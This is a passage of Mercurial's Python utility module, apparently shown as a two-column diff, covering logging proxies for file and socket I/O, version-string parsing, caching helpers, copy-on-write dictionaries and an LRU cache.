820 self.fh.flush()
820 return
821 return
821
822
822 # Simple case writes all data on a single line.
823 # Simple case writes all data on a single line.
823 if b'\n' not in data:
824 if b'\n' not in data:
824 if self.logdataapis:
825 if self.logdataapis:
825 self.fh.write(b': %s\n' % stringutil.escapestr(data))
826 self.fh.write(b': %s\n' % stringutil.escapestr(data))
826 else:
827 else:
827 self.fh.write(
828 self.fh.write(
828 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
829 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
829 )
830 )
830 self.fh.flush()
831 self.fh.flush()
831 return
832 return
832
833
833 # Data with newlines is written to multiple lines.
834 # Data with newlines is written to multiple lines.
834 if self.logdataapis:
835 if self.logdataapis:
835 self.fh.write(b':\n')
836 self.fh.write(b':\n')
836
837
837 lines = data.splitlines(True)
838 lines = data.splitlines(True)
838 for line in lines:
839 for line in lines:
839 self.fh.write(
840 self.fh.write(
840 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
841 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
841 )
842 )
842 self.fh.flush()
843 self.fh.flush()
843
844
844
845
845 class fileobjectobserver(baseproxyobserver):
846 class fileobjectobserver(baseproxyobserver):
846 """Logs file object activity."""
847 """Logs file object activity."""
847
848
848 def __init__(
849 def __init__(
849 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
850 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
850 ):
851 ):
851 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
852 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
852 self.reads = reads
853 self.reads = reads
853 self.writes = writes
854 self.writes = writes
854
855
855 def read(self, res, size=-1):
856 def read(self, res, size=-1):
856 if not self.reads:
857 if not self.reads:
857 return
858 return
858 # Python 3 can return None from reads at EOF instead of empty strings.
859 # Python 3 can return None from reads at EOF instead of empty strings.
859 if res is None:
860 if res is None:
860 res = b''
861 res = b''
861
862
862 if size == -1 and res == b'':
863 if size == -1 and res == b'':
863 # Suppress pointless read(-1) calls that return
864 # Suppress pointless read(-1) calls that return
864 # nothing. These happen _a lot_ on Python 3, and there
865 # nothing. These happen _a lot_ on Python 3, and there
865 # doesn't seem to be a better workaround to have matching
866 # doesn't seem to be a better workaround to have matching
866 # Python 2 and 3 behavior. :(
867 # Python 2 and 3 behavior. :(
867 return
868 return
868
869
869 if self.logdataapis:
870 if self.logdataapis:
870 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
871 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
871
872
872 self._writedata(res)
873 self._writedata(res)
873
874
874 def readline(self, res, limit=-1):
875 def readline(self, res, limit=-1):
875 if not self.reads:
876 if not self.reads:
876 return
877 return
877
878
878 if self.logdataapis:
879 if self.logdataapis:
879 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
880 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
880
881
881 self._writedata(res)
882 self._writedata(res)
882
883
883 def readinto(self, res, dest):
884 def readinto(self, res, dest):
884 if not self.reads:
885 if not self.reads:
885 return
886 return
886
887
887 if self.logdataapis:
888 if self.logdataapis:
888 self.fh.write(
889 self.fh.write(
889 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
890 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
890 )
891 )
891
892
892 data = dest[0:res] if res is not None else b''
893 data = dest[0:res] if res is not None else b''
893
894
894 # _writedata() uses "in" operator and is confused by memoryview because
895 # _writedata() uses "in" operator and is confused by memoryview because
895 # characters are ints on Python 3.
896 # characters are ints on Python 3.
896 if isinstance(data, memoryview):
897 if isinstance(data, memoryview):
897 data = data.tobytes()
898 data = data.tobytes()
898
899
899 self._writedata(data)
900 self._writedata(data)
900
901
901 def write(self, res, data):
902 def write(self, res, data):
902 if not self.writes:
903 if not self.writes:
903 return
904 return
904
905
905 # Python 2 returns None from some write() calls. Python 3 (reasonably)
906 # Python 2 returns None from some write() calls. Python 3 (reasonably)
906 # returns the integer bytes written.
907 # returns the integer bytes written.
907 if res is None and data:
908 if res is None and data:
908 res = len(data)
909 res = len(data)
909
910
910 if self.logdataapis:
911 if self.logdataapis:
911 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
912 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
912
913
913 self._writedata(data)
914 self._writedata(data)
914
915
915 def flush(self, res):
916 def flush(self, res):
916 if not self.writes:
917 if not self.writes:
917 return
918 return
918
919
919 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
920 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
920
921
921 # For observedbufferedinputpipe.
922 # For observedbufferedinputpipe.
922 def bufferedread(self, res, size):
923 def bufferedread(self, res, size):
923 if not self.reads:
924 if not self.reads:
924 return
925 return
925
926
926 if self.logdataapis:
927 if self.logdataapis:
927 self.fh.write(
928 self.fh.write(
928 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
929 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
929 )
930 )
930
931
931 self._writedata(res)
932 self._writedata(res)
932
933
933 def bufferedreadline(self, res):
934 def bufferedreadline(self, res):
934 if not self.reads:
935 if not self.reads:
935 return
936 return
936
937
937 if self.logdataapis:
938 if self.logdataapis:
938 self.fh.write(
939 self.fh.write(
939 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
940 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
940 )
941 )
941
942
942 self._writedata(res)
943 self._writedata(res)
943
944
944
945
945 def makeloggingfileobject(
946 def makeloggingfileobject(
946 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
947 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
947 ):
948 ):
948 """Turn a file object into a logging file object."""
949 """Turn a file object into a logging file object."""
949
950
950 observer = fileobjectobserver(
951 observer = fileobjectobserver(
951 logh,
952 logh,
952 name,
953 name,
953 reads=reads,
954 reads=reads,
954 writes=writes,
955 writes=writes,
955 logdata=logdata,
956 logdata=logdata,
956 logdataapis=logdataapis,
957 logdataapis=logdataapis,
957 )
958 )
958 return fileobjectproxy(fh, observer)
959 return fileobjectproxy(fh, observer)
959
960
960
961
961 class socketobserver(baseproxyobserver):
962 class socketobserver(baseproxyobserver):
962 """Logs socket activity."""
963 """Logs socket activity."""
963
964
964 def __init__(
965 def __init__(
965 self,
966 self,
966 fh,
967 fh,
967 name,
968 name,
968 reads=True,
969 reads=True,
969 writes=True,
970 writes=True,
970 states=True,
971 states=True,
971 logdata=False,
972 logdata=False,
972 logdataapis=True,
973 logdataapis=True,
973 ):
974 ):
974 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
975 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
975 self.reads = reads
976 self.reads = reads
976 self.writes = writes
977 self.writes = writes
977 self.states = states
978 self.states = states
978
979
979 def makefile(self, res, mode=None, bufsize=None):
980 def makefile(self, res, mode=None, bufsize=None):
980 if not self.states:
981 if not self.states:
981 return
982 return
982
983
983 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
984 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
984
985
985 def recv(self, res, size, flags=0):
986 def recv(self, res, size, flags=0):
986 if not self.reads:
987 if not self.reads:
987 return
988 return
988
989
989 if self.logdataapis:
990 if self.logdataapis:
990 self.fh.write(
991 self.fh.write(
991 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
992 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
992 )
993 )
993 self._writedata(res)
994 self._writedata(res)
994
995
995 def recvfrom(self, res, size, flags=0):
996 def recvfrom(self, res, size, flags=0):
996 if not self.reads:
997 if not self.reads:
997 return
998 return
998
999
999 if self.logdataapis:
1000 if self.logdataapis:
1000 self.fh.write(
1001 self.fh.write(
1001 b'%s> recvfrom(%d, %d) -> %d'
1002 b'%s> recvfrom(%d, %d) -> %d'
1002 % (self.name, size, flags, len(res[0]))
1003 % (self.name, size, flags, len(res[0]))
1003 )
1004 )
1004
1005
1005 self._writedata(res[0])
1006 self._writedata(res[0])
1006
1007
1007 def recvfrom_into(self, res, buf, size, flags=0):
1008 def recvfrom_into(self, res, buf, size, flags=0):
1008 if not self.reads:
1009 if not self.reads:
1009 return
1010 return
1010
1011
1011 if self.logdataapis:
1012 if self.logdataapis:
1012 self.fh.write(
1013 self.fh.write(
1013 b'%s> recvfrom_into(%d, %d) -> %d'
1014 b'%s> recvfrom_into(%d, %d) -> %d'
1014 % (self.name, size, flags, res[0])
1015 % (self.name, size, flags, res[0])
1015 )
1016 )
1016
1017
1017 self._writedata(buf[0 : res[0]])
1018 self._writedata(buf[0 : res[0]])
1018
1019
1019 def recv_into(self, res, buf, size=0, flags=0):
1020 def recv_into(self, res, buf, size=0, flags=0):
1020 if not self.reads:
1021 if not self.reads:
1021 return
1022 return
1022
1023
1023 if self.logdataapis:
1024 if self.logdataapis:
1024 self.fh.write(
1025 self.fh.write(
1025 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1026 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1026 )
1027 )
1027
1028
1028 self._writedata(buf[0:res])
1029 self._writedata(buf[0:res])
1029
1030
1030 def send(self, res, data, flags=0):
1031 def send(self, res, data, flags=0):
1031 if not self.writes:
1032 if not self.writes:
1032 return
1033 return
1033
1034
1034 self.fh.write(
1035 self.fh.write(
1035 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1036 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1036 )
1037 )
1037 self._writedata(data)
1038 self._writedata(data)
1038
1039
1039 def sendall(self, res, data, flags=0):
1040 def sendall(self, res, data, flags=0):
1040 if not self.writes:
1041 if not self.writes:
1041 return
1042 return
1042
1043
1043 if self.logdataapis:
1044 if self.logdataapis:
1044 # Returns None on success. So don't bother reporting return value.
1045 # Returns None on success. So don't bother reporting return value.
1045 self.fh.write(
1046 self.fh.write(
1046 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1047 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1047 )
1048 )
1048
1049
1049 self._writedata(data)
1050 self._writedata(data)
1050
1051
1051 def sendto(self, res, data, flagsoraddress, address=None):
1052 def sendto(self, res, data, flagsoraddress, address=None):
1052 if not self.writes:
1053 if not self.writes:
1053 return
1054 return
1054
1055
1055 if address:
1056 if address:
1056 flags = flagsoraddress
1057 flags = flagsoraddress
1057 else:
1058 else:
1058 flags = 0
1059 flags = 0
1059
1060
1060 if self.logdataapis:
1061 if self.logdataapis:
1061 self.fh.write(
1062 self.fh.write(
1062 b'%s> sendto(%d, %d, %r) -> %d'
1063 b'%s> sendto(%d, %d, %r) -> %d'
1063 % (self.name, len(data), flags, address, res)
1064 % (self.name, len(data), flags, address, res)
1064 )
1065 )
1065
1066
1066 self._writedata(data)
1067 self._writedata(data)
1067
1068
1068 def setblocking(self, res, flag):
1069 def setblocking(self, res, flag):
1069 if not self.states:
1070 if not self.states:
1070 return
1071 return
1071
1072
1072 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1073 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1073
1074
1074 def settimeout(self, res, value):
1075 def settimeout(self, res, value):
1075 if not self.states:
1076 if not self.states:
1076 return
1077 return
1077
1078
1078 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1079 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1079
1080
1080 def gettimeout(self, res):
1081 def gettimeout(self, res):
1081 if not self.states:
1082 if not self.states:
1082 return
1083 return
1083
1084
1084 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1085 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1085
1086
1086 def setsockopt(self, res, level, optname, value):
1087 def setsockopt(self, res, level, optname, value):
1087 if not self.states:
1088 if not self.states:
1088 return
1089 return
1089
1090
1090 self.fh.write(
1091 self.fh.write(
1091 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1092 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1092 % (self.name, level, optname, value, res)
1093 % (self.name, level, optname, value, res)
1093 )
1094 )
1094
1095
1095
1096
1096 def makeloggingsocket(
1097 def makeloggingsocket(
1097 logh,
1098 logh,
1098 fh,
1099 fh,
1099 name,
1100 name,
1100 reads=True,
1101 reads=True,
1101 writes=True,
1102 writes=True,
1102 states=True,
1103 states=True,
1103 logdata=False,
1104 logdata=False,
1104 logdataapis=True,
1105 logdataapis=True,
1105 ):
1106 ):
1106 """Turn a socket into a logging socket."""
1107 """Turn a socket into a logging socket."""
1107
1108
1108 observer = socketobserver(
1109 observer = socketobserver(
1109 logh,
1110 logh,
1110 name,
1111 name,
1111 reads=reads,
1112 reads=reads,
1112 writes=writes,
1113 writes=writes,
1113 states=states,
1114 states=states,
1114 logdata=logdata,
1115 logdata=logdata,
1115 logdataapis=logdataapis,
1116 logdataapis=logdataapis,
1116 )
1117 )
1117 return socketproxy(fh, observer)
1118 return socketproxy(fh, observer)
1118
1119
1119
1120
1120 def version():
1121 def version():
1121 """Return version information if available."""
1122 """Return version information if available."""
1122 try:
1123 try:
1123 from . import __version__
1124 from . import __version__
1124
1125
1125 return __version__.version
1126 return __version__.version
1126 except ImportError:
1127 except ImportError:
1127 return b'unknown'
1128 return b'unknown'
1128
1129
1129
1130
1130 def versiontuple(v=None, n=4):
1131 def versiontuple(v=None, n=4):
1131 """Parses a Mercurial version string into an N-tuple.
1132 """Parses a Mercurial version string into an N-tuple.
1132
1133
1133 The version string to be parsed is specified with the ``v`` argument.
1134 The version string to be parsed is specified with the ``v`` argument.
1134 If it isn't defined, the current Mercurial version string will be parsed.
1135 If it isn't defined, the current Mercurial version string will be parsed.
1135
1136
1136 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1137 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1137 returned values:
1138 returned values:
1138
1139
1139 >>> v = b'3.6.1+190-df9b73d2d444'
1140 >>> v = b'3.6.1+190-df9b73d2d444'
1140 >>> versiontuple(v, 2)
1141 >>> versiontuple(v, 2)
1141 (3, 6)
1142 (3, 6)
1142 >>> versiontuple(v, 3)
1143 >>> versiontuple(v, 3)
1143 (3, 6, 1)
1144 (3, 6, 1)
1144 >>> versiontuple(v, 4)
1145 >>> versiontuple(v, 4)
1145 (3, 6, 1, '190-df9b73d2d444')
1146 (3, 6, 1, '190-df9b73d2d444')
1146
1147
1147 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1148 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1148 (3, 6, 1, '190-df9b73d2d444+20151118')
1149 (3, 6, 1, '190-df9b73d2d444+20151118')
1149
1150
1150 >>> v = b'3.6'
1151 >>> v = b'3.6'
1151 >>> versiontuple(v, 2)
1152 >>> versiontuple(v, 2)
1152 (3, 6)
1153 (3, 6)
1153 >>> versiontuple(v, 3)
1154 >>> versiontuple(v, 3)
1154 (3, 6, None)
1155 (3, 6, None)
1155 >>> versiontuple(v, 4)
1156 >>> versiontuple(v, 4)
1156 (3, 6, None, None)
1157 (3, 6, None, None)
1157
1158
1158 >>> v = b'3.9-rc'
1159 >>> v = b'3.9-rc'
1159 >>> versiontuple(v, 2)
1160 >>> versiontuple(v, 2)
1160 (3, 9)
1161 (3, 9)
1161 >>> versiontuple(v, 3)
1162 >>> versiontuple(v, 3)
1162 (3, 9, None)
1163 (3, 9, None)
1163 >>> versiontuple(v, 4)
1164 >>> versiontuple(v, 4)
1164 (3, 9, None, 'rc')
1165 (3, 9, None, 'rc')
1165
1166
1166 >>> v = b'3.9-rc+2-02a8fea4289b'
1167 >>> v = b'3.9-rc+2-02a8fea4289b'
1167 >>> versiontuple(v, 2)
1168 >>> versiontuple(v, 2)
1168 (3, 9)
1169 (3, 9)
1169 >>> versiontuple(v, 3)
1170 >>> versiontuple(v, 3)
1170 (3, 9, None)
1171 (3, 9, None)
1171 >>> versiontuple(v, 4)
1172 >>> versiontuple(v, 4)
1172 (3, 9, None, 'rc+2-02a8fea4289b')
1173 (3, 9, None, 'rc+2-02a8fea4289b')
1173
1174
1174 >>> versiontuple(b'4.6rc0')
1175 >>> versiontuple(b'4.6rc0')
1175 (4, 6, None, 'rc0')
1176 (4, 6, None, 'rc0')
1176 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1177 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1177 (4, 6, None, 'rc0+12-425d55e54f98')
1178 (4, 6, None, 'rc0+12-425d55e54f98')
1178 >>> versiontuple(b'.1.2.3')
1179 >>> versiontuple(b'.1.2.3')
1179 (None, None, None, '.1.2.3')
1180 (None, None, None, '.1.2.3')
1180 >>> versiontuple(b'12.34..5')
1181 >>> versiontuple(b'12.34..5')
1181 (12, 34, None, '..5')
1182 (12, 34, None, '..5')
1182 >>> versiontuple(b'1.2.3.4.5.6')
1183 >>> versiontuple(b'1.2.3.4.5.6')
1183 (1, 2, 3, '.4.5.6')
1184 (1, 2, 3, '.4.5.6')
1184 """
1185 """
1185 if not v:
1186 if not v:
1186 v = version()
1187 v = version()
1187 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1188 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1188 if not m:
1189 if not m:
1189 vparts, extra = b'', v
1190 vparts, extra = b'', v
1190 elif m.group(2):
1191 elif m.group(2):
1191 vparts, extra = m.groups()
1192 vparts, extra = m.groups()
1192 else:
1193 else:
1193 vparts, extra = m.group(1), None
1194 vparts, extra = m.group(1), None
1194
1195
1195 assert vparts is not None # help pytype
1196 assert vparts is not None # help pytype
1196
1197
1197 vints = []
1198 vints = []
1198 for i in vparts.split(b'.'):
1199 for i in vparts.split(b'.'):
1199 try:
1200 try:
1200 vints.append(int(i))
1201 vints.append(int(i))
1201 except ValueError:
1202 except ValueError:
1202 break
1203 break
1203 # (3, 6) -> (3, 6, None)
1204 # (3, 6) -> (3, 6, None)
1204 while len(vints) < 3:
1205 while len(vints) < 3:
1205 vints.append(None)
1206 vints.append(None)
1206
1207
1207 if n == 2:
1208 if n == 2:
1208 return (vints[0], vints[1])
1209 return (vints[0], vints[1])
1209 if n == 3:
1210 if n == 3:
1210 return (vints[0], vints[1], vints[2])
1211 return (vints[0], vints[1], vints[2])
1211 if n == 4:
1212 if n == 4:
1212 return (vints[0], vints[1], vints[2], extra)
1213 return (vints[0], vints[1], vints[2], extra)
1213
1214
1214
1215
1215 def cachefunc(func):
1216 def cachefunc(func):
1216 '''cache the result of function calls'''
1217 '''cache the result of function calls'''
1217 # XXX doesn't handle keywords args
1218 # XXX doesn't handle keywords args
1218 if func.__code__.co_argcount == 0:
1219 if func.__code__.co_argcount == 0:
1219 listcache = []
1220 listcache = []
1220
1221
1221 def f():
1222 def f():
1222 if len(listcache) == 0:
1223 if len(listcache) == 0:
1223 listcache.append(func())
1224 listcache.append(func())
1224 return listcache[0]
1225 return listcache[0]
1225
1226
1226 return f
1227 return f
1227 cache = {}
1228 cache = {}
1228 if func.__code__.co_argcount == 1:
1229 if func.__code__.co_argcount == 1:
1229 # we gain a small amount of time because
1230 # we gain a small amount of time because
1230 # we don't need to pack/unpack the list
1231 # we don't need to pack/unpack the list
1231 def f(arg):
1232 def f(arg):
1232 if arg not in cache:
1233 if arg not in cache:
1233 cache[arg] = func(arg)
1234 cache[arg] = func(arg)
1234 return cache[arg]
1235 return cache[arg]
1235
1236
1236 else:
1237 else:
1237
1238
1238 def f(*args):
1239 def f(*args):
1239 if args not in cache:
1240 if args not in cache:
1240 cache[args] = func(*args)
1241 cache[args] = func(*args)
1241 return cache[args]
1242 return cache[args]
1242
1243
1243 return f
1244 return f
1244
1245
1245
1246
1246 class cow(object):
1247 class cow(object):
1247 """helper class to make copy-on-write easier
1248 """helper class to make copy-on-write easier
1248
1249
1249 Call preparewrite before doing any writes.
1250 Call preparewrite before doing any writes.
1250 """
1251 """
1251
1252
1252 def preparewrite(self):
1253 def preparewrite(self):
1253 """call this before writes, return self or a copied new object"""
1254 """call this before writes, return self or a copied new object"""
1254 if getattr(self, '_copied', 0):
1255 if getattr(self, '_copied', 0):
1255 self._copied -= 1
1256 self._copied -= 1
1256 return self.__class__(self)
1257 return self.__class__(self)
1257 return self
1258 return self
1258
1259
1259 def copy(self):
1260 def copy(self):
1260 """always do a cheap copy"""
1261 """always do a cheap copy"""
1261 self._copied = getattr(self, '_copied', 0) + 1
1262 self._copied = getattr(self, '_copied', 0) + 1
1262 return self
1263 return self
1263
1264
1264
1265
1265 class sortdict(collections.OrderedDict):
1266 class sortdict(collections.OrderedDict):
1266 '''a simple sorted dictionary
1267 '''a simple sorted dictionary
1267
1268
1268 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1269 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1269 >>> d2 = d1.copy()
1270 >>> d2 = d1.copy()
1270 >>> d2
1271 >>> d2
1271 sortdict([('a', 0), ('b', 1)])
1272 sortdict([('a', 0), ('b', 1)])
1272 >>> d2.update([(b'a', 2)])
1273 >>> d2.update([(b'a', 2)])
1273 >>> list(d2.keys()) # should still be in last-set order
1274 >>> list(d2.keys()) # should still be in last-set order
1274 ['b', 'a']
1275 ['b', 'a']
1275 >>> d1.insert(1, b'a.5', 0.5)
1276 >>> d1.insert(1, b'a.5', 0.5)
1276 >>> d1
1277 >>> d1
1277 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1278 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1278 '''
1279 '''
1279
1280
1280 def __setitem__(self, key, value):
1281 def __setitem__(self, key, value):
1281 if key in self:
1282 if key in self:
1282 del self[key]
1283 del self[key]
1283 super(sortdict, self).__setitem__(key, value)
1284 super(sortdict, self).__setitem__(key, value)
1284
1285
1285 if pycompat.ispypy:
1286 if pycompat.ispypy:
1286 # __setitem__() isn't called as of PyPy 5.8.0
1287 # __setitem__() isn't called as of PyPy 5.8.0
1287 def update(self, src):
1288 def update(self, src):
1288 if isinstance(src, dict):
1289 if isinstance(src, dict):
1289 src = pycompat.iteritems(src)
1290 src = pycompat.iteritems(src)
1290 for k, v in src:
1291 for k, v in src:
1291 self[k] = v
1292 self[k] = v
1292
1293
1293 def insert(self, position, key, value):
1294 def insert(self, position, key, value):
1294 for (i, (k, v)) in enumerate(list(self.items())):
1295 for (i, (k, v)) in enumerate(list(self.items())):
1295 if i == position:
1296 if i == position:
1296 self[key] = value
1297 self[key] = value
1297 if i >= position:
1298 if i >= position:
1298 del self[k]
1299 del self[k]
1299 self[k] = v
1300 self[k] = v
1300
1301
1301
1302
1302 class cowdict(cow, dict):
1303 class cowdict(cow, dict):
1303 """copy-on-write dict
1304 """copy-on-write dict
1304
1305
1305 Be sure to call d = d.preparewrite() before writing to d.
1306 Be sure to call d = d.preparewrite() before writing to d.
1306
1307
1307 >>> a = cowdict()
1308 >>> a = cowdict()
1308 >>> a is a.preparewrite()
1309 >>> a is a.preparewrite()
1309 True
1310 True
1310 >>> b = a.copy()
1311 >>> b = a.copy()
1311 >>> b is a
1312 >>> b is a
1312 True
1313 True
1313 >>> c = b.copy()
1314 >>> c = b.copy()
1314 >>> c is a
1315 >>> c is a
1315 True
1316 True
1316 >>> a = a.preparewrite()
1317 >>> a = a.preparewrite()
1317 >>> b is a
1318 >>> b is a
1318 False
1319 False
1319 >>> a is a.preparewrite()
1320 >>> a is a.preparewrite()
1320 True
1321 True
1321 >>> c = c.preparewrite()
1322 >>> c = c.preparewrite()
1322 >>> b is c
1323 >>> b is c
1323 False
1324 False
1324 >>> b is b.preparewrite()
1325 >>> b is b.preparewrite()
1325 True
1326 True
1326 """
1327 """
1327
1328
1328
1329
1329 class cowsortdict(cow, sortdict):
1330 class cowsortdict(cow, sortdict):
1330 """copy-on-write sortdict
1331 """copy-on-write sortdict
1331
1332
1332 Be sure to call d = d.preparewrite() before writing to d.
1333 Be sure to call d = d.preparewrite() before writing to d.
1333 """
1334 """
1334
1335
1335
1336
1336 class transactional(object): # pytype: disable=ignored-metaclass
1337 class transactional(object): # pytype: disable=ignored-metaclass
1337 """Base class for making a transactional type into a context manager."""
1338 """Base class for making a transactional type into a context manager."""
1338
1339
1339 __metaclass__ = abc.ABCMeta
1340 __metaclass__ = abc.ABCMeta
1340
1341
1341 @abc.abstractmethod
1342 @abc.abstractmethod
1342 def close(self):
1343 def close(self):
1343 """Successfully closes the transaction."""
1344 """Successfully closes the transaction."""
1344
1345
1345 @abc.abstractmethod
1346 @abc.abstractmethod
1346 def release(self):
1347 def release(self):
1347 """Marks the end of the transaction.
1348 """Marks the end of the transaction.
1348
1349
1349 If the transaction has not been closed, it will be aborted.
1350 If the transaction has not been closed, it will be aborted.
1350 """
1351 """
1351
1352
1352 def __enter__(self):
1353 def __enter__(self):
1353 return self
1354 return self
1354
1355
1355 def __exit__(self, exc_type, exc_val, exc_tb):
1356 def __exit__(self, exc_type, exc_val, exc_tb):
1356 try:
1357 try:
1357 if exc_type is None:
1358 if exc_type is None:
1358 self.close()
1359 self.close()
1359 finally:
1360 finally:
1360 self.release()
1361 self.release()
1361
1362
1362
1363
1363 @contextlib.contextmanager
1364 @contextlib.contextmanager
1364 def acceptintervention(tr=None):
1365 def acceptintervention(tr=None):
1365 """A context manager that closes the transaction on InterventionRequired
1366 """A context manager that closes the transaction on InterventionRequired
1366
1367
1367 If no transaction was provided, this simply runs the body and returns
1368 If no transaction was provided, this simply runs the body and returns
1368 """
1369 """
1369 if not tr:
1370 if not tr:
1370 yield
1371 yield
1371 return
1372 return
1372 try:
1373 try:
1373 yield
1374 yield
1374 tr.close()
1375 tr.close()
1375 except error.InterventionRequired:
1376 except error.InterventionRequired:
1376 tr.close()
1377 tr.close()
1377 raise
1378 raise
1378 finally:
1379 finally:
1379 tr.release()
1380 tr.release()
1380
1381
1381
1382
1382 @contextlib.contextmanager
1383 @contextlib.contextmanager
1383 def nullcontextmanager():
1384 def nullcontextmanager():
1384 yield
1385 yield
1385
1386
1386
1387
1387 class _lrucachenode(object):
1388 class _lrucachenode(object):
1388 """A node in a doubly linked list.
1389 """A node in a doubly linked list.
1389
1390
1390 Holds a reference to nodes on either side as well as a key-value
1391 Holds a reference to nodes on either side as well as a key-value
1391 pair for the dictionary entry.
1392 pair for the dictionary entry.
1392 """
1393 """
1393
1394
1394 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1395 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1395
1396
1396 def __init__(self):
1397 def __init__(self):
1397 self.next = None
1398 self.next = None
1398 self.prev = None
1399 self.prev = None
1399
1400
1400 self.key = _notset
1401 self.key = _notset
1401 self.value = None
1402 self.value = None
1402 self.cost = 0
1403 self.cost = 0
1403
1404
1404 def markempty(self):
1405 def markempty(self):
1405 """Mark the node as emptied."""
1406 """Mark the node as emptied."""
1406 self.key = _notset
1407 self.key = _notset
1407 self.value = None
1408 self.value = None
1408 self.cost = 0
1409 self.cost = 0
1409
1410
1410
1411
1411 class lrucachedict(object):
1412 class lrucachedict(object):
1412 """Dict that caches most recent accesses and sets.
1413 """Dict that caches most recent accesses and sets.
1413
1414
1414 The dict consists of an actual backing dict - indexed by original
1415 The dict consists of an actual backing dict - indexed by original
1415 key - and a doubly linked circular list defining the order of entries in
1416 key - and a doubly linked circular list defining the order of entries in
1416 the cache.
1417 the cache.
1417
1418
1418 The head node is the newest entry in the cache. If the cache is full,
1419 The head node is the newest entry in the cache. If the cache is full,
1419 we recycle head.prev and make it the new head. Cache accesses result in
1420 we recycle head.prev and make it the new head. Cache accesses result in
1420 the node being moved to before the existing head and being marked as the
1421 the node being moved to before the existing head and being marked as the
1421 new head node.
1422 new head node.
1422
1423
1423 Items in the cache can be inserted with an optional "cost" value. This is
1424 Items in the cache can be inserted with an optional "cost" value. This is
1424 simply an integer that is specified by the caller. The cache can be queried
1425 simply an integer that is specified by the caller. The cache can be queried
1425 for the total cost of all items presently in the cache.
1426 for the total cost of all items presently in the cache.
1426
1427
1427 The cache can also define a maximum cost. If a cache insertion would
1428 The cache can also define a maximum cost. If a cache insertion would
1428 cause the total cost of the cache to go beyond the maximum cost limit,
1429 cause the total cost of the cache to go beyond the maximum cost limit,
1429 nodes will be evicted to make room for the new code. This can be used
1430 nodes will be evicted to make room for the new code. This can be used
1430 to e.g. set a max memory limit and associate an estimated bytes size
1431 to e.g. set a max memory limit and associate an estimated bytes size
1431 cost to each item in the cache. By default, no maximum cost is enforced.
1432 cost to each item in the cache. By default, no maximum cost is enforced.
1432 """
1433 """
1433
1434
1434 def __init__(self, max, maxcost=0):
1435 def __init__(self, max, maxcost=0):
1435 self._cache = {}
1436 self._cache = {}
1436
1437
1437 self._head = head = _lrucachenode()
1438 self._head = head = _lrucachenode()
1438 head.prev = head
1439 head.prev = head
1439 head.next = head
1440 head.next = head
1440 self._size = 1
1441 self._size = 1
1441 self.capacity = max
1442 self.capacity = max
1442 self.totalcost = 0
1443 self.totalcost = 0
1443 self.maxcost = maxcost
1444 self.maxcost = maxcost
1444
1445
1445 def __len__(self):
1446 def __len__(self):
1446 return len(self._cache)
1447 return len(self._cache)
1447
1448
1448 def __contains__(self, k):
1449 def __contains__(self, k):
1449 return k in self._cache
1450 return k in self._cache
1450
1451
1451 def __iter__(self):
1452 def __iter__(self):
1452 # We don't have to iterate in cache order, but why not.
1453 # We don't have to iterate in cache order, but why not.
1453 n = self._head
1454 n = self._head
1454 for i in range(len(self._cache)):
1455 for i in range(len(self._cache)):
1455 yield n.key
1456 yield n.key
